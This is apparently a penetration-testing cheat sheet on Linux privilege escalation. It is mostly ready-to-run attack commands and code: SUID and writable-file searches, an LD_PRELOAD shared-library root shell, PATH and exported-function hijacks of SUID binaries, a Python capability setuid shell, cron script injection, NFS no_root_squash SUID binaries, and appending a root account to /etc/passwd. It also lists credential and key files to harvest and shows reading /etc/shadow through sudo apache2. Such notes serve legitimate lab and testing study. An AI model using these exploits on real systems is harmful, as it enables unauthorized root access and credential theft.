🐧Linux

Linpeas, Winpeas, etc

https://github.com/carlospolop/PEASS-ng https://github.com/rebootuser/LinEnum https://github.com/mzet-/linux-exploit-suggester https://github.com/diego-treitos/linux-smart-enumeration https://github.com/linted/linuxprivchecker

GTFO Bins

https://gtfobins.github.io/gtfobins

Sudo perms

sudo -l # View sudo perms.

If you see that you have sudo perms to run something as another user.
Use sudo *otheruser* command.

Stickies

find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null

If /bin/bash has a sticky bit set you can use /bin/bash -p for a privileged shell.

Source : https://medium.com/go-cyber/linux-privilege-escalation-with-suid-files-6119d73bc620

Find writable files

find . -writable
find / -type d -writable -print # Find writable files include full path

Config files with possible stored credentials

/home/user/myvpn.ovpn
/etc/openvpn/auth.txt
/home/user/.irssi/config
~/.bash_history

Weak File Permissions

These are files that if they have weak permissions may be exploitable.
/etc/shadow # For getting password hashes
/etc/sudoers

SSH Keys

# Make sure id_rsa perms are changed to 400 if you want to use them.
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null # Lists id_rsa keys that are readable.

Abusing Intended Functionality

sudo apache2 -f /etc/shadow # Using apache permissions to read files.

Sudo(LD_PRELOAD)

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

Compile with gcc gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles

Run sudo LD_PRELOAD=/tmp/x.so *Whatever bin is stickied*

Environment Variables - SUID

find / -type f -perm -04000 -ls 2>/dev/null # Note the stickies binaries.
strings /usr/local/bin/suid-env # Note functions used by binary

Notice this suid-env had the "system" function in it

#Exploit Method 1 - Using "system" function
Make the exploit file to be compiled. 
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
Compile it
gcc /tmp/service.c -o /tmp/service
Export path
export PATH=/tmp:$PATH
Run binary
/usr/local/bin/suid-env

In this binary /usr/sbin/service was used in a stickied binary.
#Exploit Method 2 - using /usr/sbin/service
Make the function
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
Export function to shell
export -f /usr/sbin/service # -f indicates that you are exporting a function

Capabilities - similar to SUID

Example if python capability is set to cap_setuid+ep
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Cron Jobs

cat /etc/crontab # Check for any jobs that might be running scripts
#If you can edit a cron job you can echo in your command.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> script.sh
#You would then run bash from tmp where you just copied it to.
/tmp/bash -p

NFS Root Squashing

cat /etc/exports # Look for "no_root_squash" option

#List mountable folders
showmount -e VictimIP
#Make folder in tmp.
mkdir /tmp/mounted
#Mount the folder.
mount -o rw,vers=2 VictimIP:/tmp /tmp/mounted
#Echo your exploit code to the mounted folder.
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/mounted/x.c
#Compile code with gcc
gcc /tmp/mounted/x.c -o /tmp/mounted/x
#Change perms for binary
chmod +s /tmp/mounted/x

Run the Binary on the victim machine for privilege escalation.

Writeable /etc/passwd

openssl passwd -1 -salt password password 

echo 'owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash' >> /etc/passwd

PreviousDocker NextWindows

Last updated 3 years ago

hashtagLinpeas, Winpeas, etc

hashtagGTFO Bins

hashtagSudo perms

hashtagStickies

hashtagFind writable files

hashtagConfig files with possible stored credentials

hashtagWeak File Permissions

hashtagSSH Keys

hashtagAbusing Intended Functionality

hashtagSudo(LD_PRELOAD)

hashtagEnvironment Variables - SUID

hashtagCapabilities - similar to SUID

hashtagCron Jobs

hashtagNFS Root Squashing

hashtagWriteable /etc/passwd

Linpeas, Winpeas, etc

GTFO Bins

Sudo perms

Stickies

Find writable files

Config files with possible stored credentials

Weak File Permissions

SSH Keys

Abusing Intended Functionality

Sudo(LD_PRELOAD)

Environment Variables - SUID

Capabilities - similar to SUID

Cron Jobs

NFS Root Squashing

Writeable /etc/passwd